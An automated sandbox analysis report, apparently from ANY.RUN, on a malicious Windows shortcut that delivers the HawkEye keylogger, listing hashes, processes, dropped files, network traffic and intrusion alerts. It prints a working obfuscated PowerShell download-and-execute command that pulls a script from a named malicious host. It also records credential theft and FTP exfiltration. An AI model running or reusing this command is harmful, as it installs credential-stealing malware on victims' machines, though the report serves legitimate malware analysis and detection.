| Field | Value |
|---|---|
| File name | 109284756_20190319.rtf.lnk |
| Full analysis | https://app.any.run/tasks/4c494e5b-a93c-4079-b49b-6d0aaabc7015 |
| Verdict | Malicious activity |
| Threats | Hawkeye often gets installed in a bundle with other malware. This is a Trojan and keylogger that is used to retrieve private information such as passwords and login credentials. This is an advanced malware that features strong anti-evasion functions. |
| Analysis date | March 21, 2019, 22:00:14 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/octet-stream |
| File info | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=85, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized |
| MD5 | 3069DBCBF086AF2F381D2DCE96BC6B36 |
| SHA1 | D93EF0565F8167F0D072CAD0AAF49E0641A6AF39 |
| SHA256 | 2C84AD611876EB434F38A0E2AC723955ADA6318AC4D0CC2D2E246746435B3A4A |
| SSDEEP | 24:8k/BHYVKVWS+/CWMlCcDhf8AkZJhmMFDAlZuP3M5/awGTl/03+/E4I0a5qVw:8g5akaAQ1AKP85iwGp/kAIW |
.lnk: Windows Shortcut (100)

| Field | Value |
|---|---|
| IconFileName | C:\Windows\System32\imageres.dll |
| CommandLineArguments | -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://www.tigasinarmandiri.co.id/HK/out-1063786966.ps1');ext $wbB |
| WorkingDirectory | %SYSTEMROOT%\System32\WindowsPowerShell\v1.0 |
| RelativePath | ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Description | DvLt |
| TargetFileDOSName | powershell.exe |
| HotKey | (none) |
| RunWindow | Show Minimized No Activate |
| IconIndex | 85 |
| TargetFileSize | - |
| FileAttributes | (none) |
| Flags | IDList, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpIcon |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 3472 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://www.tigasinarmandiri.co.id/HK/out-1063786966.ps1');ext $wbB | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2832 | "C:\Users\Public\acj.exe" | C:\Users\Public\acj.exe | | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 2948 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | | acj.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft .NET Assembly Registration Utility; Version: 2.0.50727.5420 (Win7SP1.050727-5400) |
| 3852 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmpB0BF.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | | RegAsm.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Visual Basic Command Line Compiler; Exit code: 0; Version: 8.0.50727.5420 |
| 2160 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmpDA22.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | | RegAsm.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Visual Basic Command Line Compiler; Exit code: 0; Version: 8.0.50727.5420 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3472 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WNR4RG3C5GS079MIT207.temp | — | — | — |
| 3472 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5017ddd8a3f3c918.customDestinations-ms | binary | AB2E6A77CEE43C91EFFA165473262439 | 71A70CE749545A17541D83D702988A7FFA470E1E977A69491C698BDDD083CA95 |
| 2832 | acj.exe | C:\Users\admin\LocationNotificationWindows\curl.vbs | text | EA7F67E8B572F81E3DACDE37E6F1FDB6 | 951A85732793F9CA8E8F049FD986A5AA635B4885DBFFCC0F0493EC9965A4AF22 |
| 3472 | powershell.exe | C:\Users\Public\acj.exe | executable | AB8B999AE4C76FEC297ED34D673824D9 | 6B5738CBE2D4B352D5D9C2F224F7CE7E0206FA11009416CF50FF96A723CB78C1 |
| 2832 | acj.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\curl.url | text | 4C3724EF10A7B6343A5A914AADE7F2D5 | BDB3E2A5ABBFBDA34AFFBBD94840AB8AAA926EFDE20764341A9EC83D9B36EE29 |
| 2832 | acj.exe | C:\Users\admin\LocationNotificationWindows\AppXDeploymentExtensions.onecore.exe | executable | B5E8D5DA168CD4678924F88859D2C7DE | 44930B59BEF77DE8EEA146C803827058BB001965DC1A8AE5B2DF07343359F90B |
| 3852 | vbc.exe | C:\Users\admin\AppData\Local\Temp\tmpB0BF.tmp | text | 3E1E093DCCE32C716267A28292E0EE27 | 56285445424AD06DC043154819B5BDABAA7C26F5779CA3E37E08424ED9926CB8 |
| 2160 | vbc.exe | C:\Users\admin\AppData\Local\Temp\tmpDA22.tmp | text | 7FB9A9AD0FD9B1E0108ED71FBB276048 | 7D63C301317E144B0133A72250AE2D8E09AF65A92E6A807EC58A71939FE530A9 |
| 2948 | RegAsm.exe | C:\Users\admin\AppData\Local\Temp\25291068-43af-3e16-50f6-5889d9ce7904 | text | 454353131947D1483FF5470107478978 | 2DF94DC1C58E952A1EBD1AE1185A291A8A573982CA90EC1BBB87B81126002668 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3472 | powershell.exe | GET | 200 | 153.92.9.220:80 | http://www.tigasinarmandiri.co.id/HK/out-1063786966.ps1 | ID | text | 2.64 Mb | malicious |
2948 | RegAsm.exe | GET | 200 | 66.171.248.178:80 | http://bot.whatismyipaddress.com/ | US | text | 15 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2948 | RegAsm.exe | 153.92.9.220:21 | www.tigasinarmandiri.co.id | Hostinger International Limited | ID | malicious |
3472 | powershell.exe | 153.92.9.220:80 | www.tigasinarmandiri.co.id | Hostinger International Limited | ID | malicious |
2948 | RegAsm.exe | 66.171.248.178:80 | bot.whatismyipaddress.com | Alchemy Communications, Inc. | US | malicious |
2948 | RegAsm.exe | 153.92.9.220:30039 | www.tigasinarmandiri.co.id | Hostinger International Limited | ID | malicious |
| Domain | IP | Reputation |
|---|---|---|
| www.tigasinarmandiri.co.id | | malicious |
| bot.whatismyipaddress.com | | shared |
| ftp.tigasinarmandiri.co.id | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3472 | powershell.exe | A Network Trojan was detected | ET TROJAN Windows executable base64 encoded |
3472 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable base64 Payload |
2948 | RegAsm.exe | A Network Trojan was detected | MALWARE [PTsecurity] Spy.HawkEye IP Check |
2948 | RegAsm.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
2948 | RegAsm.exe | A Network Trojan was detected | MALWARE [PTsecurity] Spyware.HawkEyeKeyLogger Exfiltration over FTP |
2948 | RegAsm.exe | A Network Trojan was detected | ET TROJAN HawkEye Keylogger FTP |